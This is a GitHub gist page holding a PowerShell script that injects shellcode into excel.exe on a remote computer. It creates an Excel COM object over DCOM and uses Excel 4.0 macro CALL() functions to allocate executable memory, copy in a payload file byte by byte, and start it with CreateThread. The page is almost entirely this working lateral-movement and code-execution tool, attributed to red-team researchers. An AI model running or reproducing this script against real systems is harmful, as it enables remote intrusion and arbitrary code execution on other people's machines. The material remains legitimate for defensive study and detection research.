Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#**********************************************************************
# Invoke-Excel4DCOM64.ps1
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
# Author: Stan Hegt (@StanHacked) / Outflank, x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason
# Date: 2019/04/21
# Version: 1.1
#**********************************************************************
function Invoke-Excel4DCOM
{
<#
.SYNOPSIS
Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM.
.DESCRIPTION
Use Excel 4.0 / XLM macros on a DCOM instance of excel.exe to do shellcode injection. Take care to run with the x64 switch for x64 Office,
and to use a Powershell version with the same bitness as the Office version when running locally.
.PARAMETER Computername
Specify a remote host to inject into.
.PARAMETER UserList
Specify a file containing the x86 shellcode.
.EXAMPLE
PS > Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\payload.bin
Inject x86 payload from payload.bin into excel.exe on server01.
PS > Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\x64payload.bin -x64
Inject x64 64payload from payload.bin into excel.exe on server01.
.LINK
http://www.outflank.nl
.NOTES
Outflank - stan@outflank.nl
#>
[CmdletBinding()] Param(
[Parameter(Mandatory = $true, Position = 0, ValueFromPipeline=$true)]
[Alias("PSComputerName","MachineName","IP","IPAddress","Host")]
[String]
$ComputerName,
[Parameter(Position = 1, Mandatory = $true)]
[Alias("Shellcode")]
[String]
$Payload,
[switch]$x64
)
# Create an instance of the Excel.Application COM object
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
if ($x64) {
# If we are using 64bit Excel, try to allocate a low address
$lpAddress = 1342177280
}
else {
$lpAddress = 0
}
$sc = get-content -Encoding Byte $Payload
# Address allocation
$memaddr = $excel.ExecuteExcel4Macro('CALL("Kernel32","VirtualAlloc","JJJJJ",'+$lpAddress+',' + $sc.length + ',12288,64)')
$count = 0
# Write the payload byte by byte to oure allocated buffer
foreach ($byte in $sc) {
$ret = $excel.ExecuteExcel4Macro('CALL("ntdll","memset","JJJJ", ' + ($memaddr + $count) + ',' + $byte + ', 1)')
$count = $count + 1
Write-Progress -Id 1 -Activity "Invoke-Excel4DCOM64" -CurrentOperation "Injecting shellcode" -PercentComplete ($count / $sc.length * 100)
}
# Shellcode Time!
$excel.ExecuteExcel4Macro('CALL("Kernel32","CreateThread","JJJJJJJ",0, 0, ' + $memaddr + ', 0, 0, 0)')
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.